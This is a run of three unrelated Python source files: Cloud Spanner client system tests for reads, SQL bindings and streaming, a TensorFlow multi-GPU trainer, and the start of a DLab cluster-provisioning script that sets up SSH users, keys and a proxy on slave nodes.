rows = list(snapshot.read(self.TABLE, columns, keyset, index="name"))
self.assertEqual(rows, data[start : start + 1])
def test_read_with_range_keys_index_closed_closed(self):
row_count = 10
columns = self.COLUMNS[1], self.COLUMNS[2]
data = [[row[1], row[2]] for row in self._row_data(row_count)]
self._set_up_table(row_count)
start, end = 3, 7
krange = KeyRange(start_closed=data[start], end_closed=data[end])
keyset = KeySet(ranges=(krange,))
with self._db.snapshot() as snapshot:
rows = list(snapshot.read(self.TABLE, columns, keyset, index="name"))
self.assertEqual(rows, data[start : end + 1])
def test_read_with_range_keys_index_closed_open(self):
row_count = 10
columns = self.COLUMNS[1], self.COLUMNS[2]
data = [[row[1], row[2]] for row in self._row_data(row_count)]
self._set_up_table(row_count)
start, end = 3, 7
krange = KeyRange(start_closed=data[start], end_open=data[end])
keyset = KeySet(ranges=(krange,))
with self._db.snapshot() as snapshot:
rows = list(snapshot.read(self.TABLE, columns, keyset, index="name"))
self.assertEqual(rows, data[start:end])
def test_read_with_range_keys_index_open_closed(self):
row_count = 10
columns = self.COLUMNS[1], self.COLUMNS[2]
data = [[row[1], row[2]] for row in self._row_data(row_count)]
self._set_up_table(row_count)
start, end = 3, 7
krange = KeyRange(start_open=data[start], end_closed=data[end])
keyset = KeySet(ranges=(krange,))
with self._db.snapshot() as snapshot:
rows = list(snapshot.read(self.TABLE, columns, keyset, index="name"))
self.assertEqual(rows, data[start + 1 : end + 1])
def test_read_with_range_keys_index_open_open(self):
row_count = 10
columns = self.COLUMNS[1], self.COLUMNS[2]
data = [[row[1], row[2]] for row in self._row_data(row_count)]
self._set_up_table(row_count)
start, end = 3, 7
krange = KeyRange(start_open=data[start], end_open=data[end])
keyset = KeySet(ranges=(krange,))
with self._db.snapshot() as snapshot:
rows = list(snapshot.read(self.TABLE, columns, keyset, index="name"))
self.assertEqual(rows, data[start + 1 : end])
def test_read_with_range_keys_index_limit_closed_closed(self):
row_count = 10
columns = self.COLUMNS[1], self.COLUMNS[2]
data = [[row[1], row[2]] for row in self._row_data(row_count)]
self._set_up_table(row_count)
start, end, limit = 3, 7, 2
krange = KeyRange(start_closed=data[start], end_closed=data[end])
keyset = KeySet(ranges=(krange,))
with self._db.snapshot() as snapshot:
rows = list(
snapshot.read(self.TABLE, columns, keyset, index="name", limit=limit)
)
expected = data[start : end + 1]
self.assertEqual(rows, expected[:limit])
def test_read_with_range_keys_index_limit_closed_open(self):
row_count = 10
columns = self.COLUMNS[1], self.COLUMNS[2]
data = [[row[1], row[2]] for row in self._row_data(row_count)]
self._set_up_table(row_count)
start, end, limit = 3, 7, 2
krange = KeyRange(start_closed=data[start], end_open=data[end])
keyset = KeySet(ranges=(krange,))
with self._db.snapshot() as snapshot:
rows = list(
snapshot.read(self.TABLE, columns, keyset, index="name", limit=limit)
)
expected = data[start:end]
self.assertEqual(rows, expected[:limit])
def test_read_with_range_keys_index_limit_open_closed(self):
row_count = 10
columns = self.COLUMNS[1], self.COLUMNS[2]
data = [[row[1], row[2]] for row in self._row_data(row_count)]
self._set_up_table(row_count)
start, end, limit = 3, 7, 2
krange = KeyRange(start_open=data[start], end_closed=data[end])
keyset = KeySet(ranges=(krange,))
with self._db.snapshot() as snapshot:
rows = list(
snapshot.read(self.TABLE, columns, keyset, index="name", limit=limit)
)
expected = data[start + 1 : end + 1]
self.assertEqual(rows, expected[:limit])
def test_read_with_range_keys_index_limit_open_open(self):
row_count = 10
columns = self.COLUMNS[1], self.COLUMNS[2]
data = [[row[1], row[2]] for row in self._row_data(row_count)]
self._set_up_table(row_count)
start, end, limit = 3, 7, 2
krange = KeyRange(start_open=data[start], end_open=data[end])
keyset = KeySet(ranges=(krange,))
with self._db.snapshot() as snapshot:
rows = list(
snapshot.read(self.TABLE, columns, keyset, index="name", limit=limit)
)
expected = data[start + 1 : end]
self.assertEqual(rows, expected[:limit])
def test_read_with_range_keys_and_index_closed_closed(self):
row_count = 10
columns = self.COLUMNS[1], self.COLUMNS[2]
self._set_up_table(row_count)
data = [[row[1], row[2]] for row in self._row_data(row_count)]
keyrow, start, end = 1, 3, 7
closed_closed = KeyRange(start_closed=data[start], end_closed=data[end])
keys = [data[keyrow]]
keyset = KeySet(keys=keys, ranges=(closed_closed,))
with self._db.snapshot() as snapshot:
rows = list(snapshot.read(self.TABLE, columns, keyset, index="name"))
expected = [data[keyrow]] + data[start : end + 1]
self.assertEqual(rows, expected)
def test_read_with_range_keys_and_index_closed_open(self):
row_count = 10
columns = self.COLUMNS[1], self.COLUMNS[2]
self._set_up_table(row_count)
data = [[row[1], row[2]] for row in self._row_data(row_count)]
keyrow, start, end = 1, 3, 7
closed_open = KeyRange(start_closed=data[start], end_open=data[end])
keys = [data[keyrow]]
keyset = KeySet(keys=keys, ranges=(closed_open,))
with self._db.snapshot() as snapshot:
rows = list(snapshot.read(self.TABLE, columns, keyset, index="name"))
expected = [data[keyrow]] + data[start:end]
self.assertEqual(rows, expected)
def test_read_with_range_keys_and_index_open_closed(self):
row_count = 10
columns = self.COLUMNS[1], self.COLUMNS[2]
self._set_up_table(row_count)
data = [[row[1], row[2]] for row in self._row_data(row_count)]
keyrow, start, end = 1, 3, 7
open_closed = KeyRange(start_open=data[start], end_closed=data[end])
keys = [data[keyrow]]
keyset = KeySet(keys=keys, ranges=(open_closed,))
with self._db.snapshot() as snapshot:
rows = list(snapshot.read(self.TABLE, columns, keyset, index="name"))
expected = [data[keyrow]] + data[start + 1 : end + 1]
self.assertEqual(rows, expected)
def test_read_with_range_keys_and_index_open_open(self):
row_count = 10
columns = self.COLUMNS[1], self.COLUMNS[2]
self._set_up_table(row_count)
data = [[row[1], row[2]] for row in self._row_data(row_count)]
keyrow, start, end = 1, 3, 7
open_open = KeyRange(start_open=data[start], end_open=data[end])
keys = [data[keyrow]]
keyset = KeySet(keys=keys, ranges=(open_open,))
with self._db.snapshot() as snapshot:
rows = list(snapshot.read(self.TABLE, columns, keyset, index="name"))
expected = [data[keyrow]] + data[start + 1 : end]
self.assertEqual(rows, expected)
def test_partition_read_w_index(self):
row_count = 10
columns = self.COLUMNS[1], self.COLUMNS[2]
committed = self._set_up_table(row_count)
expected = [[row[1], row[2]] for row in self._row_data(row_count)]
union = []
batch_txn = self._db.batch_snapshot(read_timestamp=committed)
batches = batch_txn.generate_read_batches(
self.TABLE, columns, KeySet(all_=True), index="name"
)
for batch in batches:
p_results_iter = batch_txn.process(batch)
union.extend(list(p_results_iter))
self.assertEqual(union, expected)
batch_txn.close()
def test_execute_sql_w_manual_consume(self):
ROW_COUNT = 3000
committed = self._set_up_table(ROW_COUNT)
with self._db.snapshot(read_timestamp=committed) as snapshot:
streamed = snapshot.execute_sql(self.SQL)
keyset = KeySet(all_=True)
with self._db.snapshot(read_timestamp=committed) as snapshot:
rows = list(snapshot.read(self.TABLE, self.COLUMNS, keyset))
self.assertEqual(list(streamed), rows)
self.assertEqual(streamed._current_row, [])
self.assertEqual(streamed._pending_chunk, None)
def _check_sql_results(
self, database, sql, params, param_types, expected, order=True
):
if order and "ORDER" not in sql:
sql += " ORDER BY pkey"
with database.snapshot() as snapshot:
rows = list(
snapshot.execute_sql(sql, params=params, param_types=param_types)
)
self._check_rows_data(rows, expected=expected)
def test_multiuse_snapshot_execute_sql_isolation_strong(self):
ROW_COUNT = 40
self._set_up_table(ROW_COUNT)
all_data_rows = list(self._row_data(ROW_COUNT))
with self._db.snapshot(multi_use=True) as strong:
before = list(strong.execute_sql(self.SQL))
self._check_row_data(before, all_data_rows)
with self._db.batch() as batch:
batch.delete(self.TABLE, self.ALL)
after = list(strong.execute_sql(self.SQL))
self._check_row_data(after, all_data_rows)
def test_execute_sql_returning_array_of_struct(self):
SQL = (
"SELECT ARRAY(SELECT AS STRUCT C1, C2 "
"FROM (SELECT 'a' AS C1, 1 AS C2 "
"UNION ALL SELECT 'b' AS C1, 2 AS C2) "
"ORDER BY C1 ASC)"
)
self._check_sql_results(
self._db,
sql=SQL,
params=None,
param_types=None,
expected=[[[["a", 1], ["b", 2]]]],
)
def test_execute_sql_returning_empty_array_of_struct(self):
SQL = (
"SELECT ARRAY(SELECT AS STRUCT C1, C2 "
"FROM (SELECT 2 AS C1) X "
"JOIN (SELECT 1 AS C2) Y "
"ON X.C1 = Y.C2 "
"ORDER BY C1 ASC)"
)
self._db.snapshot(multi_use=True)
self._check_sql_results(
self._db, sql=SQL, params=None, param_types=None, expected=[[[]]]
)
def test_invalid_type(self):
table = "counters"
columns = ("name", "value")
valid_input = (("", 0),)
with self._db.batch() as batch:
batch.delete(table, self.ALL)
batch.insert(table, columns, valid_input)
invalid_input = ((0, ""),)
with self.assertRaises(exceptions.FailedPrecondition):
with self._db.batch() as batch:
batch.delete(table, self.ALL)
batch.insert(table, columns, invalid_input)
def test_execute_sql_select_1(self):
self._db.snapshot(multi_use=True)
# Hello, world query
self._check_sql_results(
self._db,
sql="SELECT 1",
params=None,
param_types=None,
expected=[(1,)],
order=False,
)
def _bind_test_helper(
self, type_name, single_value, array_value, expected_array_value=None
):
self._db.snapshot(multi_use=True)
# Bind a non-null <type_name>
self._check_sql_results(
self._db,
sql="SELECT @v",
params={"v": single_value},
param_types={"v": Type(code=type_name)},
expected=[(single_value,)],
order=False,
)
# Bind a null <type_name>
self._check_sql_results(
self._db,
sql="SELECT @v",
params={"v": None},
param_types={"v": Type(code=type_name)},
expected=[(None,)],
order=False,
)
# Bind an array of <type_name>
array_type = Type(code=ARRAY, array_element_type=Type(code=type_name))
if expected_array_value is None:
expected_array_value = array_value
self._check_sql_results(
self._db,
sql="SELECT @v",
params={"v": array_value},
param_types={"v": array_type},
expected=[(expected_array_value,)],
order=False,
)
# Bind an empty array of <type_name>
self._check_sql_results(
self._db,
sql="SELECT @v",
params={"v": []},
param_types={"v": array_type},
expected=[([],)],
order=False,
)
# Bind a null array of <type_name>
self._check_sql_results(
self._db,
sql="SELECT @v",
params={"v": None},
param_types={"v": array_type},
expected=[(None,)],
order=False,
)
def test_execute_sql_w_string_bindings(self):
self._bind_test_helper(STRING, "Phred", ["Phred", "Bharney"])
def test_execute_sql_w_bool_bindings(self):
self._bind_test_helper(BOOL, True, [True, False, True])
def test_execute_sql_w_int64_bindings(self):
self._bind_test_helper(INT64, 42, [123, 456, 789])
def test_execute_sql_w_float64_bindings(self):
self._bind_test_helper(FLOAT64, 42.3, [12.3, 456.0, 7.89])
def test_execute_sql_w_float_bindings_transfinite(self):
# Find -inf
self._check_sql_results(
self._db,
sql="SELECT @neg_inf",
params={"neg_inf": NEG_INF},
param_types={"neg_inf": Type(code=FLOAT64)},
expected=[(NEG_INF,)],
order=False,
)
# Find +inf
self._check_sql_results(
self._db,
sql="SELECT @pos_inf",
params={"pos_inf": POS_INF},
param_types={"pos_inf": Type(code=FLOAT64)},
expected=[(POS_INF,)],
order=False,
)
def test_execute_sql_w_bytes_bindings(self):
self._bind_test_helper(BYTES, b"DEADBEEF", [b"FACEDACE", b"DEADBEEF"])
def test_execute_sql_w_timestamp_bindings(self):
import pytz
from google.api_core.datetime_helpers import DatetimeWithNanoseconds
timestamp_1 = DatetimeWithNanoseconds(
1989, 1, 17, 17, 59, 12, nanosecond=345612789
)
timestamp_2 = DatetimeWithNanoseconds(
1989, 1, 17, 17, 59, 13, nanosecond=456127893
)
timestamps = [timestamp_1, timestamp_2]
# In round-trip, timestamps acquire a timezone value.
expected_timestamps = [
timestamp.replace(tzinfo=pytz.UTC) for timestamp in timestamps
]
self._recurse_into_lists = False
self._bind_test_helper(TIMESTAMP, timestamp_1, timestamps, expected_timestamps)
def test_execute_sql_w_date_bindings(self):
import datetime
dates = [SOME_DATE, SOME_DATE + datetime.timedelta(days=1)]
self._bind_test_helper(DATE, SOME_DATE, dates)
def test_execute_sql_w_query_param_struct(self):
NAME = "Phred"
COUNT = 123
SIZE = 23.456
HEIGHT = 188.0
WEIGHT = 97.6
record_type = param_types.Struct(
[
param_types.StructField("name", param_types.STRING),
param_types.StructField("count", param_types.INT64),
param_types.StructField("size", param_types.FLOAT64),
param_types.StructField(
"nested",
param_types.Struct(
[
param_types.StructField("height", param_types.FLOAT64),
param_types.StructField("weight", param_types.FLOAT64),
]
),
),
]
)
# Query with null struct, explicit type
self._check_sql_results(
self._db,
sql="SELECT @r.name, @r.count, @r.size, @r.nested.weight",
params={"r": None},
param_types={"r": record_type},
expected=[(None, None, None, None)],
order=False,
)
# Query with non-null struct, explicit type, NULL values
self._check_sql_results(
self._db,
sql="SELECT @r.name, @r.count, @r.size, @r.nested.weight",
params={"r": (None, None, None, None)},
param_types={"r": record_type},
expected=[(None, None, None, None)],
order=False,
)
# Query with non-null struct, explicit type, nested NULL values
self._check_sql_results(
self._db,
sql="SELECT @r.nested.weight",
params={"r": (None, None, None, (None, None))},
param_types={"r": record_type},
expected=[(None,)],
order=False,
)
# Query with non-null struct, explicit type
self._check_sql_results(
self._db,
sql="SELECT @r.name, @r.count, @r.size, @r.nested.weight",
params={"r": (NAME, COUNT, SIZE, (HEIGHT, WEIGHT))},
param_types={"r": record_type},
expected=[(NAME, COUNT, SIZE, WEIGHT)],
order=False,
)
# Query with empty struct, explicitly empty type
empty_type = param_types.Struct([])
self._check_sql_results(
self._db,
sql="SELECT @r IS NULL",
params={"r": ()},
param_types={"r": empty_type},
expected=[(False,)],
order=False,
)
# Query with null struct, explicitly empty type
self._check_sql_results(
self._db,
sql="SELECT @r IS NULL",
params={"r": None},
param_types={"r": empty_type},
expected=[(True,)],
order=False,
)
# Query with equality check for struct value
struct_equality_query = (
"SELECT " '@struct_param=STRUCT<threadf INT64, userf STRING>(1,"bob")'
)
struct_type = param_types.Struct(
[
param_types.StructField("threadf", param_types.INT64),
param_types.StructField("userf", param_types.STRING),
]
)
self._check_sql_results(
self._db,
sql=struct_equality_query,
params={"struct_param": (1, "bob")},
param_types={"struct_param": struct_type},
expected=[(True,)],
order=False,
)
# Query with nullness test for struct
self._check_sql_results(
self._db,
sql="SELECT @struct_param IS NULL",
params={"struct_param": None},
param_types={"struct_param": struct_type},
expected=[(True,)],
order=False,
)
# Query with null array-of-struct
array_elem_type = param_types.Struct(
[param_types.StructField("threadid", param_types.INT64)]
)
array_type = param_types.Array(array_elem_type)
self._check_sql_results(
self._db,
sql="SELECT a.threadid FROM UNNEST(@struct_arr_param) a",
params={"struct_arr_param": None},
param_types={"struct_arr_param": array_type},
expected=[],
order=False,
)
# Query with non-null array-of-struct
self._check_sql_results(
self._db,
sql="SELECT a.threadid FROM UNNEST(@struct_arr_param) a",
params={"struct_arr_param": [(123,), (456,)]},
param_types={"struct_arr_param": array_type},
expected=[(123,), (456,)],
order=False,
)
# Query with null array-of-struct field
struct_type_with_array_field = param_types.Struct(
[
param_types.StructField("intf", param_types.INT64),
param_types.StructField("arraysf", array_type),
]
)
self._check_sql_results(
self._db,
sql="SELECT a.threadid FROM UNNEST(@struct_param.arraysf) a",
params={"struct_param": (123, None)},
param_types={"struct_param": struct_type_with_array_field},
expected=[],
order=False,
)
# Query with non-null array-of-struct field
self._check_sql_results(
self._db,
sql="SELECT a.threadid FROM UNNEST(@struct_param.arraysf) a",
params={"struct_param": (123, ((456,), (789,)))},
param_types={"struct_param": struct_type_with_array_field},
expected=[(456,), (789,)],
order=False,
)
# Query with anonymous / repeated-name fields
anon_repeated_array_elem_type = param_types.Struct(
[
param_types.StructField("", param_types.INT64),
param_types.StructField("", param_types.STRING),
]
)
anon_repeated_array_type = param_types.Array(anon_repeated_array_elem_type)
self._check_sql_results(
self._db,
sql="SELECT CAST(t as STRUCT<threadid INT64, userid STRING>).* "
"FROM UNNEST(@struct_param) t",
params={"struct_param": [(123, "abcdef")]},
param_types={"struct_param": anon_repeated_array_type},
expected=[(123, "abcdef")],
order=False,
)
# Query and return a struct parameter
value_type = param_types.Struct(
[
param_types.StructField("message", param_types.STRING),
param_types.StructField("repeat", param_types.INT64),
]
)
value_query = (
"SELECT ARRAY(SELECT AS STRUCT message, repeat "
"FROM (SELECT @value.message AS message, "
"@value.repeat AS repeat)) AS value"
)
self._check_sql_results(
self._db,
sql=value_query,
params={"value": ("hello", 1)},
param_types={"value": value_type},
expected=[([["hello", 1]],)],
order=False,
)
def test_execute_sql_returning_transfinite_floats(self):
with self._db.snapshot(multi_use=True) as snapshot:
# Query returning -inf, +inf, NaN as column values
rows = list(
snapshot.execute_sql(
"SELECT "
'CAST("-inf" AS FLOAT64), '
'CAST("+inf" AS FLOAT64), '
'CAST("NaN" AS FLOAT64)'
)
)
self.assertEqual(len(rows), 1)
self.assertEqual(rows[0][0], float("-inf"))
self.assertEqual(rows[0][1], float("+inf"))
# NaNs cannot be compared by equality.
self.assertTrue(math.isnan(rows[0][2]))
# Query returning array of -inf, +inf, NaN as one column
rows = list(
snapshot.execute_sql(
"SELECT"
' [CAST("-inf" AS FLOAT64),'
' CAST("+inf" AS FLOAT64),'
' CAST("NaN" AS FLOAT64)]'
)
)
self.assertEqual(len(rows), 1)
float_array, = rows[0]
self.assertEqual(float_array[0], float("-inf"))
self.assertEqual(float_array[1], float("+inf"))
# NaNs cannot be searched for by equality.
self.assertTrue(math.isnan(float_array[2]))
def test_partition_query(self):
row_count = 40
sql = "SELECT * FROM {}".format(self.TABLE)
committed = self._set_up_table(row_count)
# Paritioned query does not support ORDER BY
all_data_rows = set(self._row_data(row_count))
union = set()
batch_txn = self._db.batch_snapshot(read_timestamp=committed)
for batch in batch_txn.generate_query_batches(sql):
p_results_iter = batch_txn.process(batch)
# Lists aren't hashable so the results need to be converted
rows = [tuple(result) for result in p_results_iter]
union.update(set(rows))
self.assertEqual(union, all_data_rows)
batch_txn.close()
class TestStreamingChunking(unittest.TestCase, _TestData):
@classmethod
def setUpClass(cls):
from tests.system.utils.streaming_utils import INSTANCE_NAME
from tests.system.utils.streaming_utils import DATABASE_NAME
instance = Config.CLIENT.instance(INSTANCE_NAME)
if not instance.exists():
raise unittest.SkipTest(
"Run 'tests/system/utils/populate_streaming.py' to enable."
)
database = instance.database(DATABASE_NAME)
if not instance.exists():
raise unittest.SkipTest(
"Run 'tests/system/utils/populate_streaming.py' to enable."
)
cls._db = database
def _verify_one_column(self, table_desc):
sql = "SELECT chunk_me FROM {}".format(table_desc.table)
with self._db.snapshot() as snapshot:
rows = list(snapshot.execute_sql(sql))
self.assertEqual(len(rows), table_desc.row_count)
expected = table_desc.value()
for row in rows:
self.assertEqual(row[0], expected)
def _verify_two_columns(self, table_desc):
sql = "SELECT chunk_me, chunk_me_2 FROM {}".format(table_desc.table)
with self._db.snapshot() as snapshot:
rows = list(snapshot.execute_sql(sql))
self.assertEqual(len(rows), table_desc.row_count)
expected = table_desc.value()
for row in rows:
self.assertEqual(row[0], expected)
self.assertEqual(row[1], expected)
def test_four_kay(self):
from tests.system.utils.streaming_utils import FOUR_KAY
self._verify_one_column(FOUR_KAY)
def test_forty_kay(self):
from tests.system.utils.streaming_utils import FORTY_KAY
self._verify_one_column(FORTY_KAY)
def test_four_hundred_kay(self):
from tests.system.utils.streaming_utils import FOUR_HUNDRED_KAY
self._verify_one_column(FOUR_HUNDRED_KAY)
def test_four_meg(self):
from tests.system.utils.streaming_utils import FOUR_MEG
self._verify_two_columns(FOUR_MEG)
class CustomException(Exception):
"""Placeholder for any user-defined exception."""
class _DatabaseDropper(object):
"""Helper for cleaning up databases created on-the-fly."""
def __init__(self, db):
self._db = db
def delete(self):
self._db.drop()
class _ReadAbortTrigger(object):
"""Helper for tests provoking abort-during-read."""
KEY1 = "key1"
KEY2 = "key2"
def __init__(self):
self.provoker_started = threading.Event()
self.provoker_done = threading.Event()
self.handler_running = threading.Event()
self.handler_done = threading.Event()
def _provoke_abort_unit_of_work(self, transaction):
keyset = KeySet(keys=[(self.KEY1,)])
rows = list(transaction.read(COUNTERS_TABLE, COUNTERS_COLUMNS, keyset))
assert len(rows) == 1
row = rows[0]
value = row[1]
self.provoker_started.set()
self.handler_running.wait()
transaction.update(COUNTERS_TABLE, COUNTERS_COLUMNS, [[self.KEY1, value + 1]])
def provoke_abort(self, database):
database.run_in_transaction(self._provoke_abort_unit_of_work)
self.provoker_done.set()
def _handle_abort_unit_of_work(self, transaction):
keyset_1 = KeySet(keys=[(self.KEY1,)])
rows_1 = list(transaction.read(COUNTERS_TABLE, COUNTERS_COLUMNS, keyset_1))
assert len(rows_1) == 1
row_1 = rows_1[0]
value_1 = row_1[1]
self.handler_running.set()
self.provoker_done.wait()
keyset_2 = KeySet(keys=[(self.KEY2,)])
rows_2 = list(transaction.read(COUNTERS_TABLE, COUNTERS_COLUMNS, keyset_2))
assert len(rows_2) == 1
row_2 = rows_2[0]
value_2 = row_2[1]
transaction.update(
COUNTERS_TABLE, COUNTERS_COLUMNS, [[self.KEY2, value_1 + value_2]]
)
def handle_abort(self, database):
database.run_in_transaction(self._handle_abort_unit_of_work)
self.handler_done.set()
class FauxCall(object):
def __init__(self, code, details="FauxCall"):
self._code = code
self._details = details
def initial_metadata(self):
return {}
def trailing_metadata(self):
return {}
def code(self):
return self._code
def details(self):
return self._details
|
multigpu.py | #-*- coding: utf-8 -*-
#File: multigpu.py
#Author: yobobobo(zhouboacmer@qq.com)
import numpy as np
import tensorflow as tf
from tensorgo.utils import logger
from tensorgo.train.config import TrainConfig
from tensorgo.tfutils.gradient import record_variable, update_variable, \
compute_worker_gradient, apply_worker_gradients, sync_variable, fetch_all_vars
import time
import threading
__all__ = ['MultiGpuTrainer']
class MultiGpuTrainer(object):
def __init__(self, config):
assert isinstance(config, TrainConfig), type(config)
self._model = config.model
self._dataset = config.dataset
self._config = config
self.batch_count = 0
self._work_train_op = []
self._server_param = []
self._worker_param = []
self._deltas = []
self._wrap_delta = []
self._sync_worker = []
self._setup_inputs()
self._setup()
self._adam_varlist = []
def _setup_inputs(self):
with tf.device('/cpu:0'):
dataset = self._dataset
self._data_iter = tf.contrib.data.Iterator.from_structure(dataset.output_types, \
dataset.output_shapes)
self._init_data_op = self._data_iter.make_initializer(dataset)
def update_inputs(self, dataset):
self._init_data_op = self._data_iter.make_initializer(dataset)
self._sess.run(self._init_data_op)
def _setup(self):
opt = self._model.get_optimizer()
with tf.variable_scope(tf.get_variable_scope()):
for i in xrange(self._config.n_towers):
logger.info('buildding tower:{}'.format(i))
with tf.device('/gpu:{}'.format(i)):
with tf.variable_scope('tower_{}'.format(i)):
loss = self._model.build_graph(self._data_iter)
varlist = tf.trainable_variables()
val_keyword = 'tower_{}'.format(i)
varlist = filter(lambda x: val_keyword in x.name, varlist)
self._worker_param.append(varlist)
# record server model
if i == 0:
with tf.device('/cpu:0'):
self._server_param = record_variable(varlist)
#push & pull
sync_worker = update_variable(self._server_param, varlist)
with tf.device('/cpu:0'):
delta = compute_worker_gradient(self._server_param, varlist)
wrap_delta = apply_worker_gradients(opt, self._server_param, delta, scale=(1.0 / self._config.n_towers) * 0.5)
self._sync_worker.extend(sync_worker)
self._deltas.extend(delta)
self._wrap_delta.append(wrap_delta)
# end
worker_train_op = opt.minimize(loss)
self._work_train_op.append(worker_train_op)
# init session
self._sess = tf.Session(config=tf.ConfigProto(
log_device_placement=False,
allow_soft_placement=True,
gpu_options=tf.GPUOptions(per_process_gpu_memory_fraction=1.0, allow_growth=True)
))
# init graph
self.init_graph()
# init input
self._sess.run(self._init_data_op)
self._adam_varlist = filter(lambda var: 'Adam' not in var.name, tf.global_variables())
def init_graph(self):
"""init woker and server variable, all the variable should be same after initialization"""
logger.info("Initializing global parameters")
init = tf.global_variables_initializer()
self._sess.run(init)
# used first woker parameter as global initial parameter
return
for i in range(1, self._config.n_towers):
sync_op = sync_variable(self._worker_param[0], self._worker_param[i])
self._sess.run(sync_op)
sync_server_op = sync_variable(self._worker_param[0], self._server_param)
self._sess.run(sync_server_op)
logger.info("Global parameters, all parameter are same")
def push_and_pull(self):
"""aggregate workers' gradient to server and sync the model of workers"""
# unnecessary to sync model when there is only one worker
if self._config.n_towers == 1:
return
start = time.time()
wrap_gradients = self._deltas + self._wrap_delta
#self._sess.run(self._deltas)
self._sess.run(wrap_gradients)
# wrad 0.5 delta twice for better/faster convergence
self._sess.run(self._wrap_delta)
self._sess.run(self._sync_worker)
elapsed = (time.time() - start)
#self._reset_adam()
logger.info("[push_and_pull] need:{} seconds to sync the model".format(elapsed))
def _reset_adam(self):
op_list = [var.assign(var.initialized_value()) for var in self._adam_varlist]
self._sess.run(op_list)
def run(self, fetches=[], feed_dict=None, test=False, one_worker=False):
"""
Args:
fetches: A single graph element, a list of graph elements
feed_dict: A dictionary that maps graph elements to values
test: whether to run train op
one_worker: use only one worker(often used in evaluation, which could keep data's order )
"""
if self.batch_count % self._config.commbatch == 0 and not test:
logger.info('[run] batch_count:{} sync the worker'.format(self.batch_count))
#self.push_and_pull()
t = threading.Thread(target=self.push_and_pull)
t.start()
logger.info('[run] batch_count:{} sync the worker end'.format(self.batch_count))
if one_worker == False:
final_fetches = fetch_all_vars(self._worker_param, fetches, self._config.n_towers)
else:
final_fetches = fetches
if not test:
final_fetches.append(self._work_train_op)
self.batch_count += 1
ret = self._sess.run(final_fetches, feed_dict=feed_dict)
# reorganize its output
if len(fetches) == 0:
return []
else:
merge_ret = []
fetches_num = len(fetches)
for i in range(fetches_num):
if one_worker:
merge_ret.append(ret[i])
else:
merge_ret.append(np.concatenate(ret[i]))
return merge_ret
|
dataengine_configure.py | #!/usr/bin/python
# *****************************************************************************
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
# ******************************************************************************
import json
import time
from fabric.api import *
import dlab.fab
import dlab.actions_lib
import dlab.meta_lib
import traceback
import sys
import os
import uuid
import logging
from Crypto.PublicKey import RSA
import multiprocessing
def configure_slave(slave_number, data_engine):
slave_name = data_engine['slave_node_name'] + '{}'.format(slave_number + 1)
slave_hostname = GCPMeta.get_private_ip_address(slave_name)
try:
logging.info('[CREATING DLAB SSH USER ON SLAVE NODE]')
print('[CREATING DLAB SSH USER ON SLAVE NODE]')
params = "--hostname {} --keyfile {} --initial_user {} --os_user {} --sudo_group {}".format \
(slave_hostname, os.environ['conf_key_dir'] + data_engine['key_name'] + ".pem", initial_user,
data_engine['dlab_ssh_user'], sudo_group)
try:
local("~/scripts/{}.py {}".format('create_ssh_user', params))
except:
traceback.print_exc()
raise Exception
except Exception as err:
clear_resources()
dlab.fab.append_result("Failed to create ssh user on slave.", str(err))
sys.exit(1)
try:
print('[INSTALLING USERs KEY ON SLAVE NODE]')
logging.info('[INSTALLING USERs KEY ON SLAVE NODE]')
additional_config = {"user_keyname": data_engine['project_name'],
"user_keydir": os.environ['conf_key_dir']}
params = "--hostname {} --keyfile {} --additional_config '{}' --user {}".format(
slave_hostname, os.environ['conf_key_dir'] + data_engine['key_name'] + ".pem", json.dumps(
additional_config), data_engine['dlab_ssh_user'])
try:
local("~/scripts/{}.py {}".format('install_user_key', params))
except:
dlab.fab.append_result("Failed installing users key")
raise Exception
except Exception as err:
clear_resources()
dlab.fab.append_result("Failed to install ssh user key on slave.", str(err))
sys.exit(1)
try:
logging.info('[CONFIGURE PROXY ON SLAVE NODE]')
print('[CONFIGURE PROXY ON ON SLAVE NODE]')
additional_config = {"proxy_host": edge_instance_name, "proxy_port": "3128"}
params = "--hostname {} --instance_name {} --keyfile {} --additional_config '{}' --os_user {}"\
.format(slave_hostname, slave_name, keyfile_name, json.dumps(additional_config),
data_engine['dlab_ssh_user'])
try:
local("~/scripts/{}.py {}".format('common_configure_proxy', params))
except:
traceback.print_exc()
raise Exception
except Exception as err:
clear_resources()
dlab.fab.append_result("Failed to configure proxy on slave.", str(err))
sys.exit(1)
try:
logging.info('[INSTALLING PREREQUISITES ON SLAVE NODE]')
print('[INSTALLING PREREQUISITES ON SLAVE NODE]')
params = "--hostname {} --keyfile {} --user {} --region {} --edge_private_ip {}". \
format(slave_hostname, keyfile_name, data_engine['dlab_ssh_user'], data_engine['region'],
edge_instance_private_ip)
try:
local("~/scripts/{}.py {}".format('install_prerequisites', params))
except:
traceback.print_exc()
raise Exception
except Exception as err:
clear_resources()
dlab.fab.append_result("Failed to install prerequisites on slave.", str(err))
sys.exit(1)
try:
logging.info('[CONFIGURE SLAVE NODE {}]'.format(slave + 1))
print('[CONFIGURE SLAVE NODE {}]'.format(slave + 1))
params = "--hostname {} --keyfile {} --region {} --spark_version {} --hadoop_version {} --os_user {} " \
"--scala_version {} --r_mirror {} --master_ip {} --node_type {}". \
format(slave_hostname, keyfile_name, data_engine['region'], os.environ['notebook_spark_version'],
os.environ['notebook_hadoop_version'], data_engine['dlab_ssh_user'],
os.environ['notebook_scala_version'], os.environ['notebook_r_mirror'], master_node_hostname,
'slave')
try:
local("~/scripts/{}.py {}".format('configure_dataengine', params))
except:
traceback.print_exc()
raise Exception
except Exception as err:
clear_resources()
dlab.fab.append_result("Failed to configure slave node.", str(err))
sys.exit(1)
def clear_resources():
for i in range(data_engine['instance_count'] - 1):
slave_name = data_engine['slave_node_name'] + '{}'.format(i + 1)
GCPActions.remove_instance(slave_name, data_engine['zone'])
GCPActions.remove_instance(data_engine['master_node_name'], data_engine['zone'])
if __name__ == "__main__":
local_log_filename = "{}_{}_{}.log".format(os.environ['conf_resource'], os.environ['project_name'],
os.environ['request_id'])
